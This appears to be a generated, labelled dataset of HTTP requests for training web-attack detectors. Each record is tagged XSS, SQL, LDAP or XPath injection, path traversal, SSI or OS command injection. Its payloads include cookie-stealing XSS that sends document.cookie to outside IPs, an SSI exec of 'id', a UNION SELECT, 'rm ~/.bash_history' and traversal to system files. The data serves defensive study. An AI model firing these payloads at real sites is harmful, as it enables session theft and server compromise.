User-Agent: Mozilla/1.9 (compatible; Konqueror/9.2; Open BSD i586; hnetyo; mewse)
UA-CPU: 68000
UA-Disp: 434,760,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 7165x674
Via: 2.4 211.31.11.182, 2.6 231.76.26.159:681
Transfer-Encoding: identity
Upgrade: lica5r/6.9
Warning: 036 www.sm7aE.jpeg "OA9la" "Thu, 19 Nov 09 13:07:50 GMT"
X-Forwarded-For: 118.255.6.210
X-Serial-Number: 6943669939
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47661
Start - Id: 48242
class: XSS
PUT /dtdlLXk/A0/wk7php/ttFYqqHOEkrjixB7VGw/An9vbscriptY.swf? HTTP/1.1
Content-Length: 113
Content-Language: en7snr,c7s
Content-Encoding: gzip
Content-Location: /r2sh/cnhbeoh/dLnls6t/m8ueare/ll3i0e.nsf
Content-MD5: QW41aGs4c3JvdHRhc25saA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 22 Nov 09 06:01:44 GMT
Last-Modified: Tue, 08 Aug 06 23:43:48 GMT
Host: www.eentir.be
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-9;q=0.2, windows-1257;q=0.0, iso-8859-1;q=0.4, cp-932;q=0.5
Accept-Encoding: 
Accept-Language: l5glid-otfTAa3, bI9h-Atqthl;q=0.6, ooaya-pr;q=0.3
Cache-Control: no-transform
Client-ip: 251.121.92.36
Cookie: odw0e=<img src  =  "    enmaonre "onmouseover    ="   [alert ('eH1');]    "   >
Cookie2: $Version="9"
Date: Thu, 06 Apr 06 17:28:51 UTC
ETag: W/".MoDRUN36ltE73B0"
Expect: 100-continue
From: 4abpeimw@swTeELs5wa.de
If-Modified-Since: Sat, 11 Dec 04 05:58:24 GMT
If-Unmodified-Since: Sun, 26 Nov 06 01:03:40 CET
If-Match: *
If-None-Match: "9rmIK93X94S3yini"
If-Range: *
Max-Forwards: 5724
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: NTLM N3M2TnViNG5vd3BlUnZub1Qzdm5ocnNxbXNuY3NucnY=
Authorization: S4gcps ieeO=2or5r
Range: 81768-,324-291
Referer: http://www.euvian.net/Neelp0d/cgms0a/hedoee/utahsn/tiyl.tiff
TE: chunked,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/7.5 (Machintosh; U; PPC 2.8; b9-oy; rv:2.9.8) Gecko/80685350
UA-CPU: Sparc
UA-Disp: 8082,6994,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 7583x124
Via: HTTP/9.2 0.127.196.108, 8.1 www.ro3ecna.jpeg, 3eo243/5.7 116.239.115.249
Transfer-Encoding: deflate
Upgrade: Jlot/8.9, odl/2.5, hti/1.9, h7M/0.9, skAw/1.2
Warning: 210 231.146.133.235 "qTTbmhXt" "Tue, 14 Oct 08 01:41:33 UTC"
X-Forwarded-For: 168.236.127.116
X-Serial-Number: 793433345048
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1Y8link2jjRqJHi=8yud6j&0jgYrS=rayeievalui&KPAwindow.openorUUp=mFm9ALhu&sgpesx2euC=naehyuTNmh5&ytan6useetyt=eAXeCw

End - Id: 48242
Start - Id: 38183
class: LdapInjection
GET /dH/daixlyohkwtsSbeti.js?er5jTreeysagi0e=dshutdownapmmeW+4&lys7he=7p4f+&l6dHalstedHreso=430&itotcET9eel=0382&enaepaeo=ww&iudwoewor4eRhw=4990596&gcntdMebd=znMytoiel&eNInnr=224430&1fit=%29++++%28++++%7C++++%28displayName%3Dhad*%29%28name+++%3D+++had*+%29%28++++mail%3Dhad*%29&oub16rymNrolkNg=tieu%3E&ui=ahd HTTP/1.1
Host: 195.171.25.112
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-2, iso-8859-8-i;q=0.7, iso-8859-2;q=0.5
Accept-Encoding: *;q=0.2
Accept-Language: am-3i, hh-widyl1, adDpjlu-6j;q=0.7, Ad-msnNL;q=0.3
Cache-Control: min-fresh=42
Client-ip: 238.249.58.159
Cookie: eEroEsonnhh=640;Rau=6355;_zd7XYheiframe60Q=zsEKS;v6nperl@fromRAcSG0=bo0paf'zSen selectt0;TttlNirarti1o7a=positionaRi5driet
Cookie2: $Version="22"
Date: Fri, 22 May 09 11:43:11 UTC
ETag: W/"cvMbx4sfux4.USQJj"
Expect: ni4g=eota
From: nethi@otsenrjp.biz
If-Modified-Since: Tue, 11 Mar 08 22:01:25 GMT
If-Unmodified-Since: Thu, 14 Jun 07 18:11:24 UTC
If-Match: *
If-None-Match: "rcGcf5-ncVqlFbK8"
If-Range: "qqk1eSLudV2R98BwYA"
Max-Forwards: 3611
MIME-Version: 7.1
Pragma: EsRS1m=dT7u5i8c
Proxy-Authorization: Basic dGlvbDp6c2xibmU=
Authorization: Basic b3JucTpiUkV2ZTduZA==
Range: -49,281-
Referer: /0ehosdh/nttu.swf
TE: trailers,trailers,trailers
Trailer: Via
User-Agent: irdiaa0ei/7.2.8
UA-CPU: PowerPC
UA-Disp: 747,821,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5505x7135
Via: HTTP/4.9 www.ntt4eA.jpg:06
Transfer-Encoding: compress
Upgrade: rho/1.8, riptm/6.0
Warning: 995 www.tstihc.htm "sL1halusfi" 
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 276586158043
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 38183
Start - Id: 46070
class: PathTransversal
GET /miateSyik/dN20O0VHD5eR.KK/ellLAUi/kf8Hvex.gif? HTTP/1.0
Host: 253.88.184.197
Connection: gleAqinn
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: deflate;q=0.8, gzip;q=0.5, gzip, gzip, compress;q=0.2
Accept-Language: gnkry-wec;q=0.5, qanreo-br, D-aoxaiw;q=0.1, LEoni0us-n6ebshl
Cache-Control: no-cache
Cookie: t0iameVi=/etc/httpd/httpd.conf
Date: Sun, 28 Jan 07 15:03:42 CET
ETag: W/"g_AaxaUlg9rG.1oV5e"
If-Modified-Since: Sat, 27 Feb 10 15:33:21 GMT
If-Unmodified-Since: Fri, 14 May 04 04:55:40 GMT
If-Match: "N6MzGgKiQytDBp.y-s8"
If-None-Match: "AEn44m.oSizW-d6O"
Max-Forwards: 04
Pragma: no-cache
Referer: http://ettsa.fr/yhs7Iaa.jpeg
User-Agent: tr1urCrmhr (gaYQ3G0; ty7dRB7ptS)
X-Serial-Number: 66820602

null

End - Id: 46070
Start - Id: 37387
class: LdapInjection
GET /slkBWlopt-RgvtmpW/dSFNt6B/pl7J/i5/lriqexuo/yLNc83N@-fPXU-s9nW/dr9Fw8RQ8Y08OWf/tUwuho/nZuR@KjC90k3U/oWOaM/me/mtesriita.nsf?zrsacrfeYrteTn=4337&8uhn9g4Jno=orsrah HTTP/1.1
Host: www.GRdoaxe.be
Connection: keep-alive
Accept: */*
Accept-Charset: windows-874, windows-1255, iso-8859-9;q=0.3, koi8;q=0.2
Accept-Encoding: ")(targetfilter=(o=NetscapeRoot))
Accept-Language: nl-aLtMs6;q=0.5
Cache-Control: no-cache
Date: Mon, 22 Jan 07 19:22:03 CET
Expect: eaertym
If-Modified-Since: Mon, 03 Mar 08 23:03:49 CET
If-Unmodified-Since: Mon, 31 Dec 07 12:37:39 UTC
If-Match: "pBn3hxm2V3CBcS86"
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 3.8
Pragma: no-cache
Authorization: NTLM RUhkaTh0SW1kd25oemZhaXNobG5hcmVuZThvYVNldHN1dGh1cg==
Referer: http://www.roo4SM.org/odXHern1/hnnemgir/ktgmn7n/qn9pdneS.zip
Trailer: User-Agent
User-Agent: Mozilla/7.5 (Machintosh; U; Mac OS X 2.8; de-hr; rv:8.0.2) Gecko/03311069
UA-CPU: 68000
Transfer-Encoding: gzip

null

End - Id: 37387
Start - Id: 44649
class: PathTransversal
GET /uqJFXRzD9WS_Dv4y/weutnprueaoe/nZYS3kj3-sQJ-kAPW6LE/khag/rQCt_dMie@Jv@6J2.jpg? HTTP/1.1
Host: www.saab.uk:80
Connection: close
Accept-Charset: cp-936;q=0.1, koi8-r, x-mac-cyrillic;q=0.6, iso-8859-2, x-mac-cyrillic;q=0.4
Accept-Encoding: gzip, gzip;q=0.0
Accept-Language: oai-gi, neha-tonolv0;q=0.9, oz-u
Date: Sun, 14 Sep 08 04:07:42 CET
Authorization: hseh 1r7qih=ApGsE
Referer: /atblbb/sost/16n91i0/wneahp/by7a.tar
User-Agent: file:///8:/rs/lItoe/sgaaAt.xml
X-Forwarded-For: 52.237.224.178

null

End - Id: 44649
Start - Id: 49556
class: XPathInjection
GET /erwkxU/ikdApvsxo4/asesmOtii.bin?rSde5oorgdlWeo=z1AfOqf2F&lgElozo=qc2%27+++++or+++++%28i++++%3C+++++count%283nu%2Fchild%3A%3Atext%28%29%29+++++and+j+%3C+++++count%28r3%2Fchild%3A%3Acomment%28%29%29+++++and++++k++++%3C+++++count%28Emp%2Fchild%3A%3A*%29++++%29++or+%27e8ptrt3%27++++%3D++++%27+++sr%27+or&7ydb7s=rnbs-yUh5HL&ibrtcrjnea=2ihaE%3FiBh+&tabrRel0l=vsojb6eehbnn&Hlse7waqOre0=rs3 HTTP/1.1
Host: www.obassoseer.biz
Connection: keep-alive
Accept: video/*;q=0.4, image/*;q=0.8, audio/x-wav
Accept-Charset: x-mac-ce, x-mac-korean;q=0.7, shift_jis, iso-8859-3;q=0.7, windows-1254
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 86.253.108.205
Cookie: 3eadcrsn7A=hA6vFNwyaIw;ise=1f
Cookie2: $Version="6"
Date: Sun, 31 May 09 08:26:06 UTC
ETag: "XzC6Z-Vy8j2n97GIJ"
Expect: 100-continue
From: petnihea@07eei4h.cz
If-Modified-Since: Wed, 14 Jan 04 04:23:02 GMT
If-Unmodified-Since: Sat, 26 Apr 08 06:49:18 GMT
If-Match: "s@hhRfZUMmhLWXVTudU8"
If-None-Match: "kEWDeLnT.B7v3YOoK"
If-Range: "Jzovszu6u9MAiD@_x2"
Max-Forwards: 7926
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Digest username="93es"
Authorization: NTLM bG81MWFlYXRwdmFtYmhzamVlMG8yaGZhYVRyanVkT3FvTnJpaURlYw==
Range: -044
Referer: http://encsuzt.org/slaoc9/oczsrS/espohfO.tar
TE: trailers,gzip;q=0.4,deflate;q=0.6
Trailer: If-Modified-Since
User-Agent: eL5vodq
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 9192x115
Via: iiar/8.2 130.78.12.151:1, FTP/3.4 123.172.142.67
Transfer-Encoding: deflate
Upgrade: 0ba/9.3, efdwri/1.0, tlso/8.2, tVzp/3.0
Warning: 622 40.205.215.175:58 "enti0naeoeboeeo" 
X-Forwarded-For: 17.226.135.24
X-Serial-Number: 5637590848505362302
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49556
Start - Id: 39936
class: SSI
PUT /tiZYWmPA6NSqm/hhse2t0te/wPwXu/yPhw0TG4xPg4LJXgjRei/twhereYTwA/ixX_lBqd-0aS.aspx? HTTP/1.1
Content-Length: 71
Content-Language: flnTttta,ltn,hihyo
Content-Encoding: gzip
Content-Location: /ileuhn/oseionmS/0Meas/eeczo/aii5.tar
Content-MD5: ZmluSXljWmVpbHNhaWxyZw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 02 Oct 05 15:55:43 CET
Last-Modified: Fri, 30 Jun 06 07:25:29 CET
Host: www.a54tiTlre.net
Connection: e23wfmfl
Accept: image/gif
Accept-Charset: iso-8859-15;q=0.9, iso-8859-7
Accept-Encoding: identity, compress;q=0.7, compress;q=0.0, gzip;q=0.8
Accept-Language: nsrth-c;q=0.5, d4s-itia8, scntVf-ovnnsl, sAonPnth-g;q=0.4
Cache-Control: no-cache
Client-ip: 241.54.246.2
Cookie: -IV67b=sa;lk-O_=t sle%Achb;n\;ibne8taniiibda=nx8NKbnhw7;Eqeutelhmjh= si;nai0alecoxoo=deototgge
Cookie2: $Version="17"
Date: Tue, 26 Jul 05 09:02:09 UTC
ETag: W/"e2bJgcmy.crxakSF2"
Expect: 100-continue
From: 2nbiytae@onefd75.cz
If-Modified-Since: Mon, 17 Nov 08 06:21:05 CET
If-Unmodified-Since: Wed, 17 Dec 08 01:18:58 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 23 Apr 06 07:21:58 UTC
Max-Forwards: 733
MIME-Version: 6.0
Pragma: eyn2tl=de
Proxy-Authorization: Digest realm
Authorization: naadt uuhwd=aa77tee
Range: 065804-4,-22740,4181-
Referer: /rritn.pl
TE: trailers,gzip,chunked
Trailer: User-Agent
User-Agent: Mozilla/6.9 (compatible; MSIE 4.1; WinNT; AtjAei)
UA-CPU: 68000
UA-Disp: 079,5438,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 625x1975
Via: Tere/4.3 www.ed6etij.jpeg, 5.9 12.218.247.127
Transfer-Encoding: gzip
Upgrade: awoh/8.2
Warning: 471 61.54.109.103 "OTamdaleob" 
X-Forwarded-For: 54.46.237.13
X-Serial-Number: 10606493
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hanx=<!  #<!--     #exec   cmd="id"-->&cVxoaPN=arz6

End - Id: 39936
Start - Id: 40646
class: SSI
GET /IzLvoH/uINWC-dgu8U/r.yYR58p.9IcKiHT5/akSJh6l4sPa94-/4teae/iYIBs5yDwzCHEJGB_gzv/swonnrha6egi/F4Q-_ylx/oubbKZpRqKFR0FKRrx/tsI.cxgJ3CKV0sBto/eit1nn/lDnullmochaX6xtermjlocationz2.tiff?aiYkB=lebvCnvtl&lrsaegwtge=%3C%21--++++%23include+virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+++++--%3E&dewkbusza=btewgetO%3De&eeaceeheh1h=9386966656 HTTP/1.0
Host: 227.242.144.42
Connection: rsco
Accept: text/*;q=0.3, text/html;q=0.4, video/mpeg
Accept-Charset: euc-tw, big5;q=0.7, cp-936;q=0.8, iso-8859-15;q=0.3, windows-1253
Accept-Encoding: *
Accept-Language: kar-sS, hvxg1nec-hri7m
Cache-Control: max-stale=420
Client-ip: 26.207.222.161
Cookie: tIoAEagu3du3=ou4q;ck4n=206098;QgKV5-odropZC=tMUZZ;emjhcdeah4neqim=Wo6hcrnee;ra=onlosrbgsoundbetweenD0h;z1Rdico8enrmr=sa5y88PrNwu
Cookie2: $Version="931"
Date: Wed, 23 May 07 14:01:10 CET
ETag: "lBtTht_ysib8rxO9l@2"
Expect: ooeos=S6heu
From: OhLEoh@pga5e.org
If-Modified-Since: Thu, 11 May 06 22:07:16 GMT
If-Unmodified-Since: Mon, 05 Mar 07 13:25:11 UTC
If-Match: "mpZQ@IwxTC8g8jdXcuQZ"
If-None-Match: "DJFFp34WEANp78sj@"
If-Range: *
Max-Forwards: 1
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: sfoht tsob=EeAAttxn
Authorization: NTLM b0hoMGVlOGd0ZXRhZTc3b25uc0M0Z2V2b2dvT3BvZXRoVGU=
Range: 92-6240,-60877,-06
Referer: /eOchreyi/sLttar6/dytaCa.gz
TE: trailers,trailers,trailers
Trailer: Accept-Language
User-Agent: ep7aosf (uIiKMg; lv.pj3G; aq5bLDtry; tWDv64kPCt; sKdoMRXNlU)
UA-CPU: PowerPC
UA-Disp: 959,926,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 951x487
Via: FTP/7.1 164.60.33.169, 2.0 www.ee1h.png
Transfer-Encoding: gzip
Upgrade: eeyr/9.4
Warning: 643 www.anntntto.js "msA0earuygs" 
X-Forwarded-For: 197.32.78.234
X-Serial-Number: 552421
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40646
Start - Id: 47973
class: XSS
GET /-3WTO3cDG/e@1PAAyq./cu/eb/b9efign/5NxDb-BTE/ainnyIaO7Eaakict/deeah/kcsystemcaccess_logG6vptI7..png?ubaadaeopa=%3Cdiv++style++++%3D+%22++++background-image%3A+++++url%28javascript%3A+++%5Bwindow.open%28%27http%3A%2F%2F172.120.148.81%2Fnilesi.nsf%27%2Bdocument.cookie%29%3B%5D%29%3B+%22++++%3E&qs=723&0vz8Z1icS=%24seeun3nu%3B&cao=sn&zxcTa7oebntG=%5Dimgautoexec&lD0hq=1 HTTP/1.0
Host: 230.82.221.8:6
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: ia-tuo;q=0.7, e3-ewtnI;q=0.9, omodde-h;q=0.6, szr3Sro-4t;q=0.2
Cache-Control: max-stale=76560
Client-ip: 233.73.193.14
Cookie: eHae=zselect
Cookie2: $Version="480"
Date: Tue, 21 Dec 04 02:23:04 GMT
ETag: W/"iceaUEb.qmGV7uoTgOY"
Expect: 100-continue
From: etro@rlateera.gov
If-Modified-Since: Sat, 27 Mar 04 24:47:05 CET
If-Unmodified-Since: Thu, 15 Jun 06 10:40:42 CET
If-Match: *
If-None-Match: *
If-Range: "KS@_rDCk9NsUb.kxDdDr"
Max-Forwards: 986
MIME-Version: 0.3
Pragma: 3EtsTeto=nediHeN3
Proxy-Authorization: Digest nc=b2c271ed
Authorization: saeMvi u5li=itna
Range: 3229-,-51,25363-27158
Referer: http://tnd9.gov/h1ech/atei/ohcai.pdf
TE: chunked;q=0.8,deflate;q=0.2
Trailer: User-Agent
User-Agent: Mozilla/5.0 (compatible; MSIE 2.1; Unix; hmtane)
UA-CPU: 68000
UA-Disp: 305,820,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 480x167
Via: HTTP/9.1 www.v2fhrel2.jpg, FTP/9.4 www.etojy.js
Transfer-Encoding: compress
Upgrade: eat/7.3, imnF/6.2, 5tcs/7.4
Warning: 549 www.7tn2ri.jpg "cr4ayetrlreo6ceei3r" 
X-Forwarded-For: 23.144.158.109
X-Serial-Number: 41529
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47973
Start - Id: 41301
class: SqlInjection
GET /rWcu4t7rTjMZHFGr/wwinntE75UpV_LrE/wWLJ8h/p11TcT3U/te3ME9Mih6TYr0qCUhdU/hXHGGsI9FKXWHgveOgn/zcBGWhR8SvBxGCV.jpg?sfCrn6Nom=wir%7ClteC&amt4eeaa=8&elx8ng=scn&d9f=ecsGzTpRFH&78j1e8i2H=uX48 HTTP/1.0
Host: www.ewltwqatp.it:37664
Connection: close
Accept: audio/basic, audio/x-wav, video/quicktime
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: obtaa-h4jos
Cache-Control: only-if-cached
Client-ip: 97.182.86.80
Cookie: 8teeri=iejlo= chltoiwp-c;raK=36882;trELnesOloE=nSopt2;eix4e8='   )    UNION    ALL  SELECT  'tSm3Wi',5199,4707,'hq4',90     FROM  wiNcon   WHERE  (  '' =    ';tnigdrda6ue8p=ipsntihti
Cookie2: $Version="869"
Date: Fri, 16 Jan 09 03:14:56 CET
ETag: "JhjNr2i1GthRTBS"
Expect: s5Ejl
From: 7jtnsEc@oHtbtu9a.biz
If-Modified-Since: Thu, 15 Apr 10 09:27:44 GMT
If-Unmodified-Since: Mon, 10 Aug 09 21:13:19 UTC
If-Match: "4r4xJVnR9pZG@fVEywR"
If-None-Match: "Xqrwk53_u.3X@3NuRoKr"
If-Range: Mon, 08 Oct 07 05:20:19 UTC
Max-Forwards: 608
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Basic dHNoZWxpOmdrbWRsYmk=
Authorization: imot0Y 4bte=iAto
Range: 1-,9-8
Referer: /nnlpse6/eeatsu/TsNme6M/naisMkm/igr8bas.sh
TE: gzip;q=0.8,deflate;q=0.6,gzip
Trailer: User-Agent
User-Agent: Mozilla/7.0 (Machintosh; U; PPC 4.4; fl-t9; rv:9.6.1) Gecko/78888895
UA-CPU: 68000
UA-Disp: 8902,8291,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 470x0638
Via: 7.1 162.127.39.189, FTP/6.7 143.237.13.221, 8.0 249.131.140.102
Transfer-Encoding: deflate
Upgrade: 7i1/7.1, taia/3.3
Warning: 387 186.147.86.32 "h3ea5eriueh" 
X-Forwarded-For: 0.5.238.60
X-Serial-Number: 99307036492325759306
----: ----------------------------

null

End - Id: 41301
Start - Id: 43225
class: OsCommanding
GET /L.QS/alxaefefrlsstudnnhta/dcE-/uuyleae9omgrdnxka/oOesgtras/tC1t2zo2nqB/e2eDTQ@mRCV/oMcwmkWDw5DX-MO/egbPV0NQYMxBo7QzY.css?eETws9semhmiUh=%27++++%3B+++rm++%7E%2F.bash_history%3B HTTP/1.0
Host: www.d7wi1r.uk
Connection: keep-alive
Accept: text/html;q=0.3, audio/x-wav;q=0.4, application/postscript
Accept-Charset: x-mac-arabic;q=0.6, iso-8859-1
Accept-Encoding: *;q=0.8
Accept-Language: e-rsbgt;q=0.8, e59ano-dytn4h1e, betlwuoh-4s;q=0.0, Trtjg-iit8erha;q=0.3, ma-sdiAeud;q=0.4
Cache-Control: only-if-cached
Client-ip: 86.126.195.82
Cookie: iservices5MAp=fe pto;gebeaaasie7lts=68367911;imgGiHiA=340;s8oeuku=aSy3gj9
Cookie2: $Version="4"
Date: Fri, 30 Jan 04 15:15:09 UTC
ETag: "kdVzSjRw_Ku0k.MV_7"
Expect: 100-continue
From: Odth@g78cnm.uk
If-Modified-Since: Mon, 18 Apr 05 11:41:38 GMT
If-Unmodified-Since: Wed, 27 Jan 10 09:11:49 CET
If-Match: "OolKYqDtSp3SWyIfo"
If-None-Match: "nJiQc9e3l.pu9.nx9"
If-Range: "v0xW65RH93jR4xe1.zPw"
Max-Forwards: 38
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Digest cnonce="holleo"
Authorization: Pofq tqty7=7ebloswn
Range: 54119-349098
Referer: /h2iefS.zip
TE: trailers
Trailer: Referer
User-Agent: tD6Q-3O http://www.aekuel.fr
UA-CPU: x86
UA-Disp: 1503,1276,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 476x125
Via: HTTP/0.8 7.114.147.168:60733
Transfer-Encoding: gzip
Upgrade: gSz/4.2, Gseoi/5.8, rch5/7.9, 6re6d/0.4
Warning: 267 162.229.85.193 "f31ieco2yiembfnit" "Sun, 26 Nov 06 21:03:12 GMT"
X-Forwarded-For: 193.209.143.94
X-Serial-Number: 3512760212193
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43225
Start - Id: 44970
class: PathTransversal
GET /u8Ldbo/dlhaiesaeieDd.php4?sHa=%2F.%2F..%2F..%2F..%2F.%2F..%2F..%2F.%2F..%2F..%2F.%2F..%2F..%2F..%2F&cefsthhoe4csat=%7Candlinkoit0svaroa20o%24&dac0Js=51929830&o1e6canoht=Lnaawpcis&5ngteOHondp3=2206629699&child0Fyws9pF=71817138&tInerwihoa7ses=2065&An25ezoi=positionke-h&gyts=ecosaulnfEe6bt&ocsr7jieilr=i3S4c1FeajerfmoeCe&gwhO2senkly=0023494&amTsock_streamW6Ie=o5z3a&eassb=Vweo&rfau1rldee=t%3E+llg%5BdRcN9&s5Nalafeh1t=t+tenhy%7EO2gso HTTP/1.1
Host: 133.208.213.167
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: identity, compress;q=0.2
Accept-Language: *
Cache-Control: max-age=87
Client-ip: 139.199.33.4
Cookie: 5zdlnlBsaQn=r0s6hetoiur4i5
Cookie2: $Version="04"
Date: Sun, 15 May 05 10:35:13 CET
ETag: "NFwIQBsA9AL9_999R"
Expect: SkhguTri
From: rtuAdC@8eshsl.biz
If-Modified-Since: Wed, 07 Feb 07 04:17:40 GMT
If-Unmodified-Since: Tue, 05 Jul 05 10:25:31 UTC
If-Match: "lGZ-Esv5nhspCkT26rdz"
If-None-Match: *
If-Range: Sat, 08 Jan 05 14:01:02 UTC
Max-Forwards: 3
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Basic bGRBYWg6emllYg==
Authorization: NTLM ZWUxbzRqZWVhOGxlcmFCYmpyeWhpNjdyaXN1cm5uZG50YlJtcW5iNHlrZ2ViN2E=
Range: -972278
Referer: /seedhse.bin
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/4.0 (Machintosh; U; PPC Mac OS X 8.0; eu-nh; rv:3.4.5) Gecko/91834868
UA-CPU: Sparc
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 298x3014
Via: FTP/4.0 197.14.21.17
Transfer-Encoding: itro
Upgrade: tOgk/7.2, 57lv/3.4, zpxc/7.9
Warning: 367 181.6.7.177:7 "oiegnotboa" 
X-Forwarded-For: 21.25.17.174
X-Serial-Number: 1771477439
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44970
Start - Id: 39198
class: SSI
PUT /vr/spWmBWTRWxvmn.png? HTTP/1.1
Content-Length: 425
Content-Language: doe0hm,jhRa2ee,g4wnce
Content-Encoding: deflate
Content-Location: /ln9f/utoeoast/oteo4xrs/dCeeesn.jpg
Content-MD5: dWVkczg1YWVFZ3VnaHByZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 07 Mar 10 03:23:05 GMT
Last-Modified: Sun, 29 Oct 06 24:01:12 UTC
Host: www.ittadKtnr.com
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 215.91.4.112
Cookie: wodTt1saomh=85;l34o3md9=5;nOisvees=634878800;remd2uev=2porcdbie1qE;rs=040
Cookie2: $Version="690"
Date: Thu, 22 May 08 12:54:14 GMT
ETag: "8wubKIW_XpgAcflcCbqZ"
Expect: IetuMo8=urxni
From: nGxh@nraae5E.gov
If-Modified-Since: Tue, 30 May 06 22:24:16 GMT
If-Unmodified-Since: Mon, 05 Feb 07 01:10:42 GMT
If-Match: "PgkicwbziP._KvQn"
If-None-Match: "buUy7ulYGta65KvPnS5"
If-Range: "nIPxMLXiobi6t._wG"
Max-Forwards: 33
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: dlel tipu=gsey
Authorization: NTLM MlV6Zm9ucG1PZUdNaXRwc2xycUFmRWVzQXNBbnQwQngyeWFJ
Range: -6444
Referer: http://trr6.com/ehlhhmnR/frkec/tIblato/os7e/0Etin.txt
TE: chunked;q=0.9
Trailer: Proxy-Authorization
User-Agent: Mozilla/1.8 (compatible; Konqueror/2.8; Unix; syurie; crl890mO2e)
UA-Disp: 631,569,16
UA-Color: color16
UA-Pixels: 466x9263
Via: HTTP/5.8 27.74.128.76, HTTP/3.3 www.hbRNfi.css, FTP/0.0 www.oYwc.htm
Transfer-Encoding: identity
Upgrade: Ts8r/8.4, gal/2.5, ttgsuo/4.3, TobE/9.5
Warning: 774 www.u1nAt.tiff:5 "nuNymcpsqnfp7abDt" 
X-Forwarded-For: 113.114.213.108
X-Serial-Number: 4765226560917916
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

6autoexecgjXn1Km2S=yi&h4utoehtans0oe=lvncomwp-]gltn2&o06gteptsncaeh=s&nenw=083&eidm=<!--#email fromhost="www.e67orNj.com" tohost="mailbox.ywt.com" message="riipa ejhngl rigot rbtbt" fromaddress="aibd.com" toaddress="oarnt.ti7c1.com" subject="x9" sender="e0y.com" replyto="zvIpsR.com" cc="yv" inreplyto="dceae Grin son" id="anc3nmail" -->&9tltehe=3og

End - Id: 39198
Start - Id: 46987
class: XSS
GET /0FyI2_2ClQ_CL/tzes81oieta/sddHf/uJ/oDhWmmb0IIKq.CNIH.shtml?5bsbMo.samQ=tfylenaieli+&wRtHeatgsionnN=mtt8ltospsnwmnsfsi&z.httpsetOhyqeval1=tLJGAn&s.CbD=%3Ca+++++href%3D+%22++++about%3A%3Cs%26%2399%3Bript+++%3E%5Bwindow.open%28%27http%3A%2F%2F163.124.77.91%2Frolare.php3%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript++%3E++%22+%3E&qmmW5AcB=hZCMOLBaUYV&narqlneEtaj=86921&V5qoE7O.7F=68&fia5erb3ekcl=e2s%2Bat+adl+&Nqet95feaaheE=tsn5e7 HTTP/1.0
Host: 149.81.164.48
Connection: ghhwKuR
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=624
Client-ip: 132.186.238.69
Cookie: kSagioulsfle=erKHtdvyI
Cookie2: $Version="85"
Date: Mon, 06 Dec 04 08:50:12 UTC
ETag: W/"Buq@whtrMtHZH-Bk7Zb"
Expect: Fijtt
From: wj0oee@a4ld5r2exe.uk
If-Modified-Since: Sun, 22 May 05 19:28:50 CET
If-Unmodified-Since: Wed, 09 Jan 08 22:04:13 UTC
If-Match: "SywjKMELc6z13vbYAl"
If-None-Match: *
If-Range: Sat, 20 Jun 09 08:56:48 GMT
Max-Forwards: 4239
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: clHnxy lpUlaI=7zeNS
Range: 5-22964
Referer: /teI8s/nzTda/eneJTmeo/Nc2mce.htm
TE: gzip,trailers,gzip
Trailer: Range
User-Agent: ixt78DLq http://www.e6neou.de
UA-Disp: 2976,173,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 199x2885
